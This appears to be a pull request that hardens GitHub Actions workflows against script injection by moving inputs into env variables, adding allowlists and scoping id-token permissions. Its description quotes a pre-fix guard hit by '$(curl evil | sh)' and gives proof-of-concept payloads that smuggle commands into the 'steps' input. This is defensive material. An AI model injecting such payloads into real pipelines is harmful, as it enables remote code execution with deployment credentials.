### PR TITLE
sec(ci): stop interpolating migration inputs into run blocks

### DIFF
--- a/.github/workflows/database-migration.yml
+++ b/.github/workflows/database-migration.yml
@@ -23,8 +23,12 @@
 
 name: Database Migration
 
+# Least privilege by default: only the jobs that actually authenticate to a
+# cloud provider get `id-token: write`, and every one of those jobs is bound to
+# a deployment environment (`aws-db-<env>`, `gcp-db-<env>`, `azure-db-<env>`).
+# `validate` and `summary` never authenticate, so they stay on the `contents:
+# read` floor below.
 permissions:
-  id-token: write
   contents: read
 
 on:
@@ -77,6 +81,8 @@ jobs:
   validate:
     name: Validate Migration Request
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     outputs:
       is_safe: ${{ steps.check.outputs.is_safe }}
 
@@ -89,16 +95,60 @@ jobs:
       - name: Safety checks
         id: check
         env:
+          CLOUD: ${{ inputs.cloud }}
           ENVIRONMENT: ${{ inputs.environment }}
           DIRECTION: ${{ inputs.direction }}
           STEPS: ${{ inputs.steps }}
           CONFIRM: ${{ inputs.confirm }}
         run: |
+          set -uo pipefail
           IS_SAFE=true
 
+          # `workflow_call` never declares a `steps` input, so on that path this
+          # renders empty. Treat that the same as the explicit default of "0"
+          # (apply/rollback everything) rather than rejecting it outright.
+          STEPS="${STEPS:-0}"
+
+          # workflow_dispatch's cloud/environment/direction are `type: choice`,
+          # enforced server-side before the run starts. workflow_call's are plain
+          # `type: string` with no such enforcement, so re-validate them here
+          # against the same allowlist regardless of which trigger fired.
+          case "$CLOUD" in
+            aws|gcp|azure|all) ;;
+            *)
+              echo "❌ Invalid cloud provider: '$CLOUD' (expected aws, gcp, azure, or all)"
+              IS_SAFE=false
+              ;;
+          esac
+
+          case "$ENVIRONMENT" in
+            dev|staging|prod) ;;
+            *)
+              echo "❌ Invalid environment: '$ENVIRONMENT' (expected dev, staging, or prod)"
+              IS_SAFE=false
+              ;;
+          esac
+
+          case "$DIRECTION" in
+            up|down) ;;
+            *)
+              echo "❌ Invalid direction: '$DIRECTION' (expected up or down)"
+              IS_SAFE=false
+              ;;
+          esac
+
           # Check if migrations directory exists
-          if [ ! -d "${{ env.MIGRATIONS_PATH }}" ]; then
-            echo "❌ Migrations directory not found: ${{ env.MIGRATIONS_PATH }}"
+          if [ ! -d "$MIGRATIONS_PATH" ]; then
+            echo "❌ Migrations directory not found: $MIGRATIONS_PATH"
+            IS_SAFE=false
+          fi
+
+          # `steps` must be a non-negative integer regardless of direction: 0
+          # means "everything" for direction=up, and direction=down requires an
+          # explicit positive value (checked separately below). Reject anything
+          # else before it can reach a migrate invocation in either direction.
+          if ! [[ "$STEPS" =~ ^(0|[1-9][0-9]*)$ ]]; then
+            echo "❌ 'steps' must be a non-negative integer (got '$STEPS')."
             IS_SAFE=false
           fi
 
@@ -107,7 +157,7 @@ jobs:
           # entire schema, so it is rejected here for direction=down.
           if [[ "$DIRECTION" == "down" ]]; then
             if ! [[ "$STEPS" =~ ^[1-9][0-9]*$ ]]; then
-              echo "❌ direction=down requires an explicit positive 'steps' value (got '${STEPS:-<empty>}')."
+              echo "❌ direction=down requires an explicit positive 'steps' value (got '$STEPS')."
               echo "Rolling back ALL migrations at once is not supported by this workflow."
               IS_SAFE=false
             fi
@@ -124,21 +174,21 @@ jobs:
           fi
 
           # Check migration files
-          if [ -d "${{ env.MIGRATIONS_PATH }}" ]; then
-            UP_COUNT=$(ls -1 ${{ env.MIGRATIONS_PATH }}/*.up.sql 2>/dev/null | wc -l)
-            DOWN_COUNT=$(ls -1 ${{ env.MIGRATIONS_PATH }}/*.down.sql 2>/dev/null | wc -l)
+          if [ -d "$MIGRATIONS_PATH" ]; then
+            UP_COUNT=$(ls -1 "$MIGRATIONS_PATH"/*.up.sql 2>/dev/null | wc -l)
+            DOWN_COUNT=$(ls -1 "$MIGRATIONS_PATH"/*.down.sql 2>/dev/null | wc -l)
 
             echo "Migration files found:"
             echo "  Up migrations: $UP_COUNT"
             echo "  Down migrations: $DOWN_COUNT"
 
-            if [ $UP_COUNT -eq 0 ]; then
+            if [ "$UP_COUNT" -eq 0 ]; then
               echo "❌ No migration files found"
               IS_SAFE=false
             fi
           fi
 
-          echo "is_safe=$IS_SAFE" >> $GITHUB_OUTPUT
+          echo "is_safe=$IS_SAFE" >> "$GITHUB_OUTPUT"
 
           if [[ "$IS_SAFE" != "true" ]]; then
             echo "Validation failed; refusing to run migrations."
@@ -146,18 +196,26 @@ jobs:
           fi
 
       - name: Display migration plan
+        env:
+          CLOUD: ${{ inputs.cloud }}
+          ENVIRONMENT: ${{ inputs.environment }}
+          DIRECTION: ${{ inputs.direction }}
+          STEPS: ${{ inputs.steps || 'all' }}
         run: |
-          echo "## Database Migration Plan" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
-          echo "**Cloud:** ${{ inputs.cloud }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Environment:** ${{ inputs.environment }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Direction:** ${{ inputs.direction }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Steps:** ${{ inputs.steps || 'all' }}" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
+          set -uo pipefail
+          {
+            echo "## Database Migration Plan"
+            echo ""
+            echo "**Cloud:** $CLOUD"
+            echo "**Environment:** $ENVIRONMENT"
+            echo "**Direction:** $DIRECTION"
+            echo "**Steps:** $STEPS"
+            echo ""
 
-          if [[ "${{ inputs.environment }}" == "prod" ]] && [[ "${{ inputs.direction }}" == "down" ]]; then
-            echo "⚠️ **WARNING:** This will rollback migrations on PRODUCTION!" >> $GITHUB_STEP_SUMMARY
-          fi
+            if [[ "$ENVIRONMENT" == "prod" ]] && [[ "$DIRECTION" == "down" ]]; then
+              echo "⚠️ **WARNING:** This will rollback migrations on PRODUCTION!"
+            fi
+          } >> "$GITHUB_STEP_SUMMARY"
 
   # Run AWS migrations
   migrate-aws:
@@ -167,6 +225,9 @@ jobs:
     if: |
       needs.validate.outputs.is_safe == 'true' &&
       (inputs.cloud == 'aws' || inputs.cloud == 'all')
+    permissions:
+      id-token: write
+      contents: read
     environment:
       name: aws-db-${{ inputs.environment }}
 
@@ -205,35 +266,50 @@ jobs:
       - name: Run migrations
         env:
           DB_PASSWORD: ${{ secrets.DB_PASSWORD_AWS }}
+          DB_ENDPOINT: ${{ steps.get-endpoint.outputs.endpoint }}
+          DIRECTION: ${{ inputs.direction }}
+          STEPS: ${{ inputs.steps }}
         run: |
-          DB_URL="postgresql://cudly:${DB_PASSWORD}@${{ steps.get-endpoint.outputs.endpoint }}:5432/cudly?sslmode=require"
+          set -uo pipefail
+          DB_URL="postgresql://cudly:${DB_PASSWORD}@${DB_ENDPOINT}:5432/cudly?sslmode=require"
 
-          if [[ "${{ inputs.direction }}" == "up" ]]; then
-            if [[ "${{ inputs.steps }}" == "0" ]]; then
+          # `validate` already rejects a malformed `steps`/`direction` before this
+          # job is ever reached, but this job sits behind an environment gate and
+          # is the thing that actually runs `migrate`, so the checks are repeated
+          # here against the re-parsed shell variable as defense in depth.
+          STEPS="${STEPS:-0}"
+
+          if [[ "$DIRECTION" == "up" ]]; then
+            if ! [[ "$STEPS" =~ ^(0|[1-9][0-9]*)$ ]]; then
+              echo "❌ 'steps' must be a non-negative integer (got '$STEPS')."
+              exit 1
+            fi
+            if [[ "$STEPS" == "0" ]]; then
               echo "Applying all pending migrations..."
-              migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" up
+              migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" up
             else
-              echo "Applying ${{ inputs.steps }} migration(s)..."
-              migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" up ${{ inputs.steps }}
+              echo "Applying $STEPS migration(s)..."
+              migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" up "$STEPS"
             fi
           else
-            # Defense in depth: validate already rejects this, but never run 'down -all'.
-            if ! [[ "${{ inputs.steps }}" =~ ^[1-9][0-9]*$ ]]; then
+            if ! [[ "$STEPS" =~ ^[1-9][0-9]*$ ]]; then
               echo "❌ Refusing to roll back without an explicit positive 'steps' value."
               exit 1
             fi
-            echo "Rolling back ${{ inputs.steps }} migration(s)..."
-            migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" down ${{ inputs.steps }}
+            echo "Rolling back $STEPS migration(s)..."
+            migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" down "$STEPS"
           fi
 
       - name: Get migration version
         env:
           DB_PASSWORD: ${{ secrets.DB_PASSWORD_AWS }}
+          DB_ENDPOINT: ${{ steps.get-endpoint.outputs.endpoint }}
         run: |
-          DB_URL="postgresql://cudly:${DB_PASSWORD}@${{ steps.get-endpoint.outputs.endpoint }}:5432/cudly?sslmode=require"
-          VERSION=$(migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" version 2>&1 || echo "unknown")
+          set -uo pipefail
+          DB_URL="postgresql://cudly:${DB_PASSWORD}@${DB_ENDPOINT}:5432/cudly?sslmode=require"
+          VERSION=$(migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" version 2>&1 || echo "unknown")
           echo "Current migration version: $VERSION"
-          echo "MIGRATION_VERSION=$VERSION" >> $GITHUB_ENV
+          echo "MIGRATION_VERSION=$VERSION" >> "$GITHUB_ENV"
 
   # Run GCP migrations
   migrate-gcp:
@@ -243,6 +319,9 @@ jobs:
     if: |
       needs.validate.outputs.is_safe == 'true' &&
       (inputs.cloud == 'gcp' || inputs.cloud == 'all')
+    permissions:
+      id-token: write
+      contents: read
     environment:
       name: gcp-db-${{ inputs.environment }}
 
@@ -284,22 +363,31 @@ jobs:
       - name: Run migrations
         env:
           DB_PASSWORD: ${{ secrets.DB_PASSWORD_GCP }}
+          DB_ENDPOINT: ${{ steps.get-endpoint.outputs.endpoint }}
+          DIRECTION: ${{ inputs.direction }}
+          STEPS: ${{ inputs.steps }}
         run: |
-          DB_URL="postgresql://cudly:${DB_PASSWORD}@${{ steps.get-endpoint.outputs.endpoint }}:5432/cudly?sslmode=require"
+          set -uo pipefail
+          DB_URL="postgresql://cudly:${DB_PASSWORD}@${DB_ENDPOINT}:5432/cudly?sslmode=require"
 
-          if [[ "${{ inputs.direction }}" == "up" ]]; then
-            if [[ "${{ inputs.steps }}" == "0" ]]; then
-              migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" up
+          STEPS="${STEPS:-0}"
+
+          if [[ "$DIRECTION" == "up" ]]; then
+            if ! [[ "$STEPS" =~ ^(0|[1-9][0-9]*)$ ]]; then
+              echo "❌ 'steps' must be a non-negative integer (got '$STEPS')."
+              exit 1
+            fi
+            if [[ "$STEPS" == "0" ]]; then
+              migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" up
             else
-              migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" up ${{ inputs.steps }}
+              migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" up "$STEPS"
             fi
           else
-            # Defense in depth: validate already rejects this, but never run 'down -all'.
-            if ! [[ "${{ inputs.steps }}" =~ ^[1-9][0-9]*$ ]]; then
+            if ! [[ "$STEPS" =~ ^[1-9][0-9]*$ ]]; then
               echo "❌ Refusing to roll back without an explicit positive 'steps' value."
               exit 1
             fi
-            migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" down ${{ inputs.steps }}
+            migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" down "$STEPS"
           fi
 
   # Run Azure migrations
@@ -310,6 +398,9 @@ jobs:
     if: |
       needs.validate.outputs.is_safe == 'true' &&
       (inputs.cloud == 'azure' || inputs.cloud == 'all')
+    permissions:
+      id-token: write
+      contents: read
     environment:
       name: azure-db-${{ inputs.environment }}
 
@@ -349,51 +440,72 @@ jobs:
       - name: Run migrations
         env:
           DB_PASSWORD: ${{ secrets.DB_PASSWORD_AZURE }}
+          DB_ENDPOINT: ${{ steps.get-endpoint.outputs.endpoint }}
+          DIRECTION: ${{ inputs.direction }}
+          STEPS: ${{ inputs.steps }}
         run: |
-          DB_URL="postgresql://cudly:${DB_PASSWORD}@${{ steps.get-endpoint.outputs.endpoint }}:5432/cudly?sslmode=require"
+          set -uo pipefail
+          DB_URL="postgresql://cudly:${DB_PASSWORD}@${DB_ENDPOINT}:5432/cudly?sslmode=require"
 
-          if [[ "${{ inputs.direction }}" == "up" ]]; then
-            if [[ "${{ inputs.steps }}" == "0" ]]; then
-              migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" up
+          STEPS="${STEPS:-0}"
+
+          if [[ "$DIRECTION" == "up" ]]; then
+            if ! [[ "$STEPS" =~ ^(0|[1-9][0-9]*)$ ]]; then
+              echo "❌ 'steps' must be a non-negative integer (got '$STEPS')."
+              exit 1
+            fi
+            if [[ "$STEPS" == "0" ]]; then
+              migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" up
             else
-              migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" up ${{ inputs.steps }}
+              migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" up "$STEPS"
             fi
           else
-            # Defense in depth: validate already rejects this, but never run 'down -all'.
-            if ! [[ "${{ inputs.steps }}" =~ ^[1-9][0-9]*$ ]]; then
+            if ! [[ "$STEPS" =~ ^[1-9][0-9]*$ ]]; then
               echo "❌ Refusing to roll back without an explicit positive 'steps' value."
               exit 1
             fi
-            migrate -path ${{ env.MIGRATIONS_PATH }} -database "$DB_URL" down ${{ inputs.steps }}
+            migrate -path "$MIGRATIONS_PATH" -database "$DB_URL" down "$STEPS"
           fi
 
   # Summary
   summary:
     name: Migration Summary
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     needs: [validate, migrate-aws, migrate-gcp, migrate-azure]
     if: always()
 
     steps:
       - name: Post summary
+        env:
+          CLOUD: ${{ inputs.cloud }}
+          ENVIRONMENT: ${{ inputs.environment }}
+          DIRECTION: ${{ inputs.direction }}
+          RESULT_AWS: ${{ needs.migrate-aws.result }}
+          RESULT_GCP: ${{ needs.migrate-gcp.result }}
+          RESULT_AZURE: ${{ needs.migrate-azure.result }}
         run: |
-          echo "## Database Migration Results" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
-          echo "**Cloud:** ${{ inputs.cloud }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Environment:** ${{ inputs.environment }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Direction:** ${{ inputs.direction }}" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
+          set -uo pipefail
+          {
+            echo "## Database Migration Results"
+            echo ""
+            echo "**Cloud:** $CLOUD"
+            echo "**Environment:** $ENVIRONMENT"
+            echo "**Direction:** $DIRECTION"
+            echo ""
 
-          echo "### Results" >> $GITHUB_STEP_SUMMARY
+            echo "### Results"
 
-          if [[ "${{ inputs.cloud }}" == "aws" ]] || [[ "${{ inputs.cloud }}" == "all" ]]; then
-            echo "- AWS: ${{ needs.migrate-aws.result }}" >> $GITHUB_STEP_SUMMARY
-          fi
+            if [[ "$CLOUD" == "aws" ]] || [[ "$CLOUD" == "all" ]]; then
+              echo "- AWS: $RESULT_AWS"
+            fi
 
-          if [[ "${{ inputs.cloud }}" == "gcp" ]] || [[ "${{ inputs.cloud }}" == "all" ]]; then
-            echo "- GCP: ${{ needs.migrate-gcp.result }}" >> $GITHUB_STEP_SUMMARY
-          fi
+            if [[ "$CLOUD" == "gcp" ]] || [[ "$CLOUD" == "all" ]]; then
+              echo "- GCP: $RESULT_GCP"
+            fi
 
-          if [[ "${{ inputs.cloud }}" == "azure" ]] || [[ "${{ inputs.cloud }}" == "all" ]]; then
-            echo "- Azure: ${{ needs.migrate-azure.result }}" >> $GITHUB_STEP_SUMMARY
-          fi
+            if [[ "$CLOUD" == "azure" ]] || [[ "$CLOUD" == "all" ]]; then
+              echo "- Azure: $RESULT_AZURE"
+            fi
+          } >> "$GITHUB_STEP_SUMMARY"

--- a/.github/workflows/deploy-aws-fargate.yml
+++ b/.github/workflows/deploy-aws-fargate.yml
@@ -73,14 +73,30 @@ jobs:
     steps:
       - name: Determine environment
         id: set-env
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          INPUT_ENVIRONMENT: ${{ inputs.environment }}
         run: |
-          if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then
-            echo "environment=${{ inputs.environment }}" >> $GITHUB_OUTPUT
-          elif [[ "${{ github.event_name }}" == "workflow_call" ]]; then
-            echo "environment=${{ inputs.environment }}" >> $GITHUB_OUTPUT
-          else
-            echo "environment=dev" >> $GITHUB_OUTPUT
-          fi
+          set -euo pipefail
+          INPUT_ENVIRONMENT="${INPUT_ENVIRONMENT:-}"
+
+          case "$EVENT_NAME" in
+            workflow_dispatch|workflow_call) ENVIRONMENT="$INPUT_ENVIRONMENT" ;;
+            *)                               ENVIRONMENT=dev ;;
+          esac
+
+          # workflow_dispatch constrains this to the declared `choice` options,
+          # but the workflow_call input is typed as a free-form string, so the
+          # allowlist is enforced here rather than assumed.
+          case "$ENVIRONMENT" in
+            dev|staging|prod) ;;
+            *)
+              echo "::error::Refusing unknown environment: $ENVIRONMENT"
+              exit 1
+              ;;
+          esac
+
+          echo "environment=$ENVIRONMENT" >> "$GITHUB_OUTPUT"
 
       - name: Set image tag
         id: set-tag

--- a/.github/workflows/deploy-azure.yml
+++ b/.github/workflows/deploy-azure.yml
@@ -74,14 +74,30 @@ jobs:
     steps:
       - name: Determine environment
         id: set-env
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          INPUT_ENVIRONMENT: ${{ inputs.environment }}
         run: |
-          if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then
-            echo "environment=${{ inputs.environment }}" >> $GITHUB_OUTPUT
-          elif [[ "${{ github.event_name }}" == "workflow_call" ]]; then
-            echo "environment=${{ inputs.environment }}" >> $GITHUB_OUTPUT
-          else
-            echo "environment=dev" >> $GITHUB_OUTPUT
-          fi
+          set -euo pipefail
+          INPUT_ENVIRONMENT="${INPUT_ENVIRONMENT:-}"
+
+          case "$EVENT_NAME" in
+            workflow_dispatch|workflow_call) ENVIRONMENT="$INPUT_ENVIRONMENT" ;;
+            *)                               ENVIRONMENT=dev ;;
+          esac
+
+          # workflow_dispatch constrains this to the declared `choice` options,
+          # but the workflow_call input is typed as a free-form string, so the
+          # allowlist is enforced here rather than assumed.
+          case "$ENVIRONMENT" in
+            dev|staging|prod) ;;
+            *)
+              echo "::error::Refusing unknown environment: $ENVIRONMENT"
+              exit 1
+              ;;
+          esac
+
+          echo "environment=$ENVIRONMENT" >> "$GITHUB_OUTPUT"
 
   # Build Docker image (via Terraform build module) and deploy
   build-and-deploy:

--- a/.github/workflows/deploy-gcp.yml
+++ b/.github/workflows/deploy-gcp.yml
@@ -65,14 +65,30 @@ jobs:
     steps:
       - name: Determine environment
         id: set-env
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          INPUT_ENVIRONMENT: ${{ inputs.environment }}
         run: |
-          if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then
-            echo "environment=${{ inputs.environment }}" >> $GITHUB_OUTPUT
-          elif [[ "${{ github.event_name }}" == "workflow_call" ]]; then
-            echo "environment=${{ inputs.environment }}" >> $GITHUB_OUTPUT
-          else
-            echo "environment=dev" >> $GITHUB_OUTPUT
-          fi
+          set -euo pipefail
+          INPUT_ENVIRONMENT="${INPUT_ENVIRONMENT:-}"
+
+          case "$EVENT_NAME" in
+            workflow_dispatch|workflow_call) ENVIRONMENT="$INPUT_ENVIRONMENT" ;;
+            *)                               ENVIRONMENT=dev ;;
+          esac
+
+          # workflow_dispatch constrains this to the declared `choice` options,
+          # but the workflow_call input is typed as a free-form string, so the
+          # allowlist is enforced here rather than assumed.
+          case "$ENVIRONMENT" in
+            dev|staging|prod) ;;
+            *)
+              echo "::error::Refusing unknown environment: $ENVIRONMENT"
+              exit 1
+              ;;
+          esac
+
+          echo "environment=$ENVIRONMENT" >> "$GITHUB_OUTPUT"
 
   # Build Docker image (via Terraform build module) and deploy
   build-and-deploy:


### PR DESCRIPTION
## Summary

`database-migration.yml` interpolated `${{ inputs.direction }}` and `${{ inputs.steps }}` directly into the shell source of every `migrate-*` job's `run:` block. This closes the injection and the specific "guard runs after interpolation" trap named in the issue title, and fixes the byte-identical pattern found in three sibling files during the required repo-wide sweep.

## Does the post-interpolation guard work the way the title describes? Yes, confirmed

GitHub Actions substitutes `${{ ... }}` expressions into the `run:` script **text** before bash ever parses that text. So for the `direction=down` guard:

```yaml
if ! [[ "${{ inputs.steps }}" =~ ^[1-9][0-9]*$ ]]; then
```

a `steps` value of `$(curl evil | sh)` is substituted first, producing:

```bash
if ! [[ "$(curl evil | sh)" =~ ^[1-9][0-9]*$ ]]; then
```

bash then evaluates the command substitution **while evaluating the guard's own condition**, before the guard can reject anything. The guard validates the string that a payload produced, not the payload itself, by which point the payload already ran.

I reproduced this locally rather than asserting it from reading the YAML: rendered the pre-fix template with `python3` string substitution (mirroring exactly what GitHub's templating does), then executed the rendered script.

- **`direction=up` path (no guard at all):** payload `1; touch PWNED_OLD #` as `steps` executed `touch` directly. Confirmed file created.
- **`direction=down` path (the "guard"):** payload `$(touch PWNED_GUARD)` as `steps`. The script printed "Refusing to roll back..." and exited 1 (the guard "worked", from the workflow's perspective) — **and the marker file was still created**, proving the injected command ran during the guard's own condition evaluation, before the rejection.

Then ran the *fixed* logic with the same two payloads delivered as real environment variables (`STEPS='...' bash new_fixed_up.sh`, matching how the runner actually passes `env:` values) — both were rejected as inert string data with zero execution, in either path.

## Fix (database-migration.yml)

- Route every `inputs.*` value through `env:` and reference the quoted shell variable. No `${{ }}` remains in any `run:` block in this file — matches the standard set by the already-merged #1641 (`rollback.yml`) and #1657 (`deploy-aws-lambda.yml`).
- Validate `steps` for `direction=up` too, not only `down` (the issue's explicit finding: "any other value passes `validate` untouched"). Checked in `validate` and again in each `migrate-*` job as defense in depth, mirroring the existing down-path pattern.
- Validate the `workflow_call` string inputs (`cloud`, `environment`, `direction`) against an explicit allowlist in `validate`. `workflow_dispatch` constrains these via `type: choice` (server-side enforced); `workflow_call` typed them as free-form strings with no such enforcement — this was the "latent `workflow_call` surface" the issue flagged.
- Drop `id-token: write` to job level, granted only to the environment-bound `migrate-aws` / `migrate-gcp` / `migrate-azure` jobs. `validate` and `summary` never authenticate to a cloud provider.
- `${{ env.MIGRATIONS_PATH }}` (a static, non-attacker-controlled workflow-level value) is referenced as `$MIGRATIONS_PATH` directly — it's already exported as a real shell env var by GitHub for every step in the workflow, so the `${{ }}` wrapper was redundant once everything else was being converted for consistency.

## Sibling sweep (as requested)

Grepped `.github/workflows/*.yml` for `${{ inputs.* }}` / `${{ github.event.* }}` reaching a `run:` block. Findings, classified:

| File | Line(s) | Expression | Verdict |
|---|---|---|---|
| `deploy-gcp.yml` | prepare/"Determine environment" | `${{ inputs.environment }}` | **Byte-identical to the already-fixed #1657 pattern. Fixed here.** |
| `deploy-aws-fargate.yml` | prepare/"Determine environment" | `${{ inputs.environment }}` | **Byte-identical. Fixed here.** |
| `deploy-azure.yml` | prepare/"Determine environment" | `${{ inputs.environment }}` | **Byte-identical. Fixed here.** |
| `deploy-all.yml` | "Set cloud providers" | `${{ inputs.deploy_to \|\| 'all' }}` | Same shape, but not exploitable: `deploy-all.yml` has no `workflow_call` trigger, so `inputs.deploy_to` is always `type: choice`, server-side enforced. Left as-is (out of scope, not byte-identical to the vulnerable pattern since there's no free-text path). |
| everywhere | various | `${{ github.event_name }}` | Not attacker-controlled (GitHub's own trigger-type enum). No action needed. |

The three fixed occurrences were **more severe** than database-migration.yml's: each `prepare` job is completely ungated (no `environment:` binding) *and* still holds workflow-level `id-token: write` in all three files — the same ungated-and-credentialed shape #1657 fixed in `deploy-aws-lambda.yml` and #1641 fixed in `rollback.yml`, just not yet applied here. I mirrored that exact already-merged pattern (case-based dispatch through `env:` + explicit workflow_call allowlist) rather than inventing a new one.

**Scope note:** I fixed only the byte-identical interpolation line in each of the three sibling files (the `prepare` job's "Determine environment" step), not a full rewrite of those files. Each has other `${{ }}` usages in `run:` blocks (Terraform apply steps, deployment-info heredocs, etc.) that reference either GitHub-safe values (`github.actor`, `github.sha`) or values already validated by this fix (`needs.prepare.outputs.environment`) — none are raw untrusted string paths, so I left them untouched per the proportionate-fix constraint. Flagging for awareness, not fixing here.

**Also flagging, not fixing:** these three files still declare `permissions: id-token: write` at *workflow* level (all jobs including `prepare`, `test-deployment`, `summary` inherit it), matching the class tracked by #1659 ("workflows granting `id-token: write` to ungated jobs"). Scoping that down to job level the way #1641/#1657 did is a larger, separate change than "env indirection and guard ordering" — leaving it for #1659 or a dedicated follow-up rather than expanding this PR.

## Verification

- **actionlint (v1.7.12)**, diffed against each file's unmodified `origin/main` version (same method as PR #1724): zero new finding types introduced in any of the four files. Every remaining finding (`SC2086`/`SC2012`/style, all `info`/`style` severity) is pre-existing shellcheck debt in `run:` blocks this change does not touch (the Terraform-endpoint steps' unquoted `$GITHUB_OUTPUT`, an `ls` vs `find` style suggestion).
- **`act -l`** on all four changed workflow files: job graphs parse correctly with the new `env:`/`permissions:` blocks in place (`workflow_dispatch`, `workflow_call`, and `push` where applicable).
- **Local injection PoC** (see above): reproduced the actual pre-fix RCE on both the `up` and `down` paths, then re-ran the fixed logic against the identical payloads and confirmed rejection with no execution.
- Did not dispatch a real migration or deploy workflow (no database/cloud credentials in this environment).

## Scope

`env:` indirection, guard ordering/coverage, workflow_call input validation, and job-level `id-token` scoping only — the same four items the issue's "Fix direction" section named, applied to `database-migration.yml`, plus the byte-identical pattern in three siblings. No concurrency groups (#1593), no Terraform backend config changes (#1589), no version pin changes (#1588), no restructuring beyond what's described above.

Closes #1647
